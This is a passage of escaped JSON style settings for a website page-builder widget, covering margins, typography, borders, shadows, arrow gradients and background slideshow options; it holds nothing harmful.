\",\"post_button_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"post_button_alignment\":\"flex-start\",\"post_button_alignment_tablet\":\"\",\"post_button_alignment_mobile\":\"\",\"terms_link_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"terms_link_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"terms_link_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"terms_link_bg_color\":\"\",\"terms_link_color\":\"\",\"terms_link_typography_typography\":\"\",\"terms_link_typography_font_family\":\"\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"terms_link_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"terms_link_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"terms_link_typography_font_weight\":\"\",\"terms_link_typography_text_transform\":\"\",\"terms_link_typography_font_style\":\"\",\"terms_link_typography_text_decoration\":\"\",\"terms_link_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"terms_link_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"terms_link_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"terms_link_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"terms_link_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"terms_link_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"terms_link_text_decor\":\"none\",\"terms_link_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"terms_link_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"terms_link_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"terms_link_border_border\":\"\",\"terms_link_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"terms_link_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"terms_link_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"terms_link_border_color\":\"\",\"terms_link_box_shadow_box_shadow_type\":\"\",\"terms_link_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"terms_link_box_shadow_box_shadow_position\":\" \",\"terms_link_hover_bg_color\":\"\",\"terms_link_hover_color\":\"\",\"terms_link_hover_typography_typography\":\"\",\"terms_link_hover_typography_font_family\":\"\",\"terms_link_hover_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"terms_link_hover_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"terms_link_hover_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"terms_link_hover_typography_font_weight\":\"\",\"terms_link_hover_typography_text_transform\":\"\",\"terms_link_hover_typography_font_style\":\"\",\"terms_link_hover_typography_text_decoration\":\"\",\"terms_link_hover_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"terms_link_hover_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"terms_link_hover_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"terms_link_hover_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"terms_link_hover_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"terms_link_hover_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"terms_link_hover_text_decor\":\"none\",\"terms_link_hover_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"terms_link_hover_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"terms_link_hover_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"terms_link_hover_border_border\":\"\",\"terms_link_hover_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"terms_link_hover_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"terms_link_hover_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"terms_link_hover_border_color\":\"\",\"terms_link_hover_box_shadow_box_shadow_type\":\"\",\"terms_link_hover_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"terms_link_hover_box_shadow_box_shadow_position\":\" \",\"terms_link_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"terms_link_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"terms_link_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"arrows_style_box_font_color\":\"\",\"arrows_style_background\":\"\",\"arrows_style_color\":\"\",\"arrows_style_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"arrows_style_color_b\":\"#f2295b\",\"arrows_style_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"arrows_style_gradient_type\":\"linear\",\"arrows_style_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"arrows_style_gradient_position\":\"center center\",\"arrows_style_box_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"arrows_style_box_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"arrows_style_box_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"arrows_style_box_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"arrows_style_box_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"arrows_style_box_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"arrows_style_box_border\":\"\",\"arrows_style_box_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"arrows_style_box_border_color\":\"\",\"arrows_style_box_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"arrows_style_allow_box_shadow\":\"\",\"arrows_style_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"arrows_style_box_shadow_position\":\" \",\"arrows_style_hover_popover_toggle\":\"\",\"arrows_style_hover_box_font_color\":\"\",\"arrows_style_hover_background\":\"\",\"arrows_style_hover_color\":\"\",\"arrows_style_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"arrows_style_hover_color_b\":\"#f2295b\",\"arrows_style_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"arrows_style_hover_gradient_type\":\"linear\",\"arrows_style_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"arrows_style_hover_gradient_position\":\"center center\",\"arrows_style_hover_box_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"arrows_style_hover_box_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"arrows_style_hover_box_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"arrows_style_hover_box_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"arrows_style_hover_box_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"arrows_style_hover_box_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"arrows_style_hover_box_border\":\"\",\"arrows_style_hover_box_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"arrows_style_hover_box_border_color\":\"\",\"arrows_style_hover_box_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"arrows_style_hover_allow_box_shadow\":\"\",\"arrows_style_hover_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"arrows_style_hover_box_shadow_position\":\" \",\"prev_vert_position\":\"top\",\"prev_top_position\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"prev_top_position_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"prev_top_position_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"prev_bottom_position\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"prev_bottom_position_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"prev_bottom_position_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"prev_hor_position\":\"left\",\"prev_left_position\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"prev_left_position_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"prev_left_position_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"prev_right_position\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"prev_right_position_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"prev_right_position_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"next_vert_position\":\"top\",\"next_top_position\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"next_top_position_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"next_top_position_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"next_bottom_position\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"next_bottom_position_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"next_bottom_position_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"next_hor_position\":\"right\",\"next_left_position\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"next_left_position_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"next_left_position_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"next_right_position\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"next_right_position_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"next_right_position_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"title_related_meta_bg_color\":\"\",\"title_related_meta_label_color\":\"\",\"title_related_meta_label_typography_typography\":\"\",\"title_related_meta_label_typography_font_family\":\"\",\"title_related_meta_label_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"title_related_meta_label_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"title_related_meta_label_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"title_related_meta_label_typography_font_weight\":\"\",\"title_related_meta_label_typography_text_transform\":\"\",\"title_related_meta_label_typography_font_style\":\"\",\"title_related_meta_label_typography_text_decoration\":\"\",\"title_related_meta_label_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"title_related_meta_label_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"title_related_meta_label_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"title_related_meta_label_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"title_related_meta_label_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"title_related_meta_label_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"title_related_meta_label_display\":\"\",\"title_related_meta_label_gap\":5,\"title_related_meta_color\":\"\",\"title_related_meta_typography_typography\":\"\",\"title_related_meta_typography_font_family\":\"\",\"title_related_meta_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"title_related_meta_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"title_related_meta_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"title_related_meta_typography_font_weight\":\"\",\"title_related_meta_typography_text_transform\":\"\",\"title_related_meta_typography_font_style\":\"\",\"title_related_meta_typography_text_decoration\":\"\",\"title_related_meta_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"title_related_meta_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"title_related_meta_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"title_related_meta_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"title_related_meta_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"title_related_meta_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"title_related_meta_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"title_related_meta_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"title_related_meta_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"title_related_meta_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"title_related_meta_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"title_related_meta_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"title_related_meta_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"title_related_meta_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"title_related_meta_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"title_related_meta_align\":\"\",\"title_related_meta_align_tablet\":\"\",\"title_related_meta_align_mobile\":\"\",\"content_related_meta_bg_color\":\"\",\"content_related_meta_label_color\":\"\",\"content_related_meta_label_typography_typography\":\"\",\"content_related_meta_label_typography_font_family\":\"\",\"content_related_meta_label_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"content_related_meta_label_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"content_related_meta_label_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"content_related_meta_label_typography_font_weight\":\"\",\"content_related_meta_label_typography_text_transform\":\"\",\"content_related_meta_label_typography_font_style\":\"\",\"content_related_meta_label_typography_text_decoration\":\"\",\"content_related_meta_label_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"content_related_meta_label_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"content_related_meta_label_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"content_related_meta_label_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"content_related_meta_label_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"content_related_meta_label_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"content_related_meta_label_display\":\"\",\"content_related_meta_label_gap\":5,\"content_related_meta_color\":\"\",\"content_related_meta_typography_typography\":\"\",\"content_related_meta_typography_font_family\":\"\",\"content_related_meta_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"content_related_meta_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"content_related_meta_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"content_related_meta_typography_font_weight\":\"\",\"content_related_meta_typography_text_transform\":\"\",\"content_related_meta_typography_font_style\":\"\",\"content_related_meta_typography_text_decoration\":\"\",\"content_related_meta_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"content_related_meta_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"content_related_meta_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"content_related_meta_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"content_related_meta_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"content_related_meta_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"content_related_meta_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"content_related_meta_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"content_related_meta_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"content_related_meta_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"content_related_meta_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"content_related_meta_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"content_related_meta_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"content_related_meta_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"content_related_meta_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"content_related_meta_align\":\"\",\"content_related_meta_align_tablet\":\"\",\"content_related_meta_align_mobile\":\"\",\"loader_opacity\":{\"unit\":\"%\",\"size\":0.5,\"sizes\":[]},\"loader_opacity_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"loader_opacity_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"loader_dash_color\":\"\",\"loader_track_color\":\"\",\"_title\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_z_index\":\"\",\"_element_id\":\"\",\"_css_classes\":\"\",\"jet_family_widget_is_order_orientaion\":\"false\",\"jet_family_widget_order_orientaion\":\"\",\"jet_family_widget_order_orientaion_tablet\":\"\",\"jet_family_widget_order_orientaion_mobile\":\"\",\"jet_family_widget_is_flex_basis\":\"false\",\"jet_family_widget_flex_basis\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"jet_family_widget_flex_basis_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"jet_family_widget_flex_basis_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_animation\":\"\",\"_animation_tablet\":\"\",\"_animation_mobile\":\"\",\"animation_duration\":\"\",\"_animation_delay\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b\":\"#f2295b\",\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_type\":\"linear\",\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_gradient_position\":\"center center\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_position_tablet\":\"\",\"_background_position_mobile\":\"\",\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_repeat_tablet\":\"\",\"_background_repeat_mobile\":\"\",\"_background_size\":\"\",\"_background_size_tablet\":\"\",\"_background_size_mobile\":\"\",\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_video_link\":\"\",\"_background_video_start\":\"\",\"_background_video_end\":\"\",\"_background_play_once\":\"\",\"_background_play_on_mobile\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_slideshow_loop\":\"yes\",\"_background_slideshow_slide_duration\":5000,\"_background_slideshow_slide_transition\":\"fade\",\"_background_slideshow_transition_duration\":500,\"_background_slideshow_ken_burns\":\"\",\"_background_slideshow_ken_burns_zoom_direction\":\"in\",\"_background_hover_background\":\"\",\"_background_hover_color\":\"\",\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b\":\"#f2295b\",\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_type\":\"linear\",\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_gradient_position\":\"center center\",\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_position\":\"\",\"_background_hover_position_tablet\":\"\",\"_background_hover_position_mobile\":\"\",\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_attachment\":\"\",\"_background_hover_repeat\":\"\",\"_background_hover_repeat_tablet\":\"\",\"_background_hover_repeat_mobile\":\"\",\"_background_hover_size\":\"\",\"_background_hover_size_tablet\":\"\",\"_background_hover_size_mobile\":\"\",\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_video_link\":\"\",\"_background_hover_video_start\":\"\",\"_background_hover_video_end\":\"\",\"_background_hover_play_once\":\"\",\"_background_hover_play_on_mobile\":\"\",\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[],\"_background_hover_slideshow_loop\":\"yes\",\"_background_hover_slideshow_slide_duration\":5000,\"_background_hover_slideshow_slide_transition\":\"fade\",\"_background_hover_slideshow_transition_duration\":500,\"_background_hover_slideshow_ken_burns\":\"\",\"_background_hover_slideshow_ken_burns_zoom_direction\":\"in\",\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"_box_shadow_box_shadow_position\":\" \",\"_border_hover_border\":\"\",\"_border_hover_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_width_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_width_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_hover_color\":\"\",\"_border_radius_hover\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_hover_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_radius_hover_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_hover_box_shadow_type\":\"\",\"_box_shadow_hover_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.5)\"},\"_box_shadow_hover_box_shadow_position\":\" 